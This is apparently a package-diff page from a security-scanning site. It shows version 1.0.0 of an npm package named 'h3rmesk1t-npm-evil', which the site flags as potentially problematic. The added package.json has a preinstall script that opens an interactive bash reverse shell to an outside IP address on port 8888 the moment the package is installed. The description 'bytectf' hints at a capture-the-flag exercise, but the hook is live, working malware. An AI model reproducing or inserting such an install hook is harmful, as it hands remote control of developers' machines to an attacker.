h3rmesk1t-npm-evil 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of h3rmesk1t-npm-evil might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +0 -0
  2. package/package.json +16 -0
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "h3rmesk1t-npm-evil",
3
+ "version": "1.0.0",
4
+ "description": "bytectf",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "bash -c 'bash -i >& /dev/tcp/162.14.108.78/8888 0>&1'",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "keywords": [
11
+ "npm evil"
12
+ ],
13
+ "author": "h3rmesk1t",
14
+ "license": "ISC",
15
+ "dependencies": {}
16
+ }